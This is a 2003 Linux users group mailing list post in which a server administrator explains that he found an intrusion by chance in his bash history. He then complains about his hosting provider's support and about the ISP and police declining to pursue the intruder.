ACK! -- CONTINUED

Bradley Miller bradmiller at dslonramp.com
Sun Apr 20 03:52:34 CDT 2003 

At 08:18 PM 4/19/2003 -0700, you wrote:

>I'm just curious, what tipped you off that the box was
>compromised? Were there any obvious signs, or did you
>catch something in your logs?
>
>Kurt

Since there is alot of people asking, I'll give you the details:

Actually discovered it purely by accident.  I have one server that is 
bouncing up and down, why I don't know.  I decided to restore my database 
backup onto one of my other servers and start running it as my secondary 
server in the interim.  While there I accidently hit the down arrow to 
recall a previous command, and saw a peculiar instruction.  I looked in the 
bash history file and sure enough, I found the intruder.  They installed a 
"toolz" file to compromise the system and then a "clean me up" script to 
remove all traces of their activity.  Unfortunately for them, and 
fortunately for me, I could see where they were keying the server to 
respond to with all the info.

Now -- earlier today and this week, I've spent HOURS on the phone with 
Interland.  Communitech's servers went to Atlanta, Georgia a month ago or 
so.  I CANNOT RECOMMEND INTERLAND  -- THEY ARE WAY TO BIG FOR DECENT 
CUSTOMER SUPPORT!!!!  I just signed a contract earlier this week for two 
new servers over at Netstandard . . . I can only hope they go in fast 
enough to curb this problem.

Want to hear some really funny stuff?   I had snooped around and found 
where this little *%#$#'s IP was from, since they left some "traces" in my 
system.  I do an ARIN lookup and find the ip range is totally owned by one 
ISP.  I call up the ISP and get the runaround that to get the info, I'll 
need the police department to call.  I call up the local police department, 
explain the situation, call them back and then they tell the officer they 
can't do anything without a subpoena.  The officer can't do anything 
because my servers are in Atlanta, Georgia, so technically the crime has 
been committed there.  Now what are the odds that I'll get a cop in Atlanta 
to investigate this?  The ISP told me that they would probably just warn an 
individual if they found proof.  WARN THEM?  If I walk in to a liquor store 
and walk out with a bottle of booze and a freakin' bag of money (without 
paying), how is it any different than doing the same to a server?     But 
the ISP won't let me see the freakin' security camera -- because it would 
be a privacy issue?   Give me a break!

-- Bradley Miller

More information about the Kclug mailing list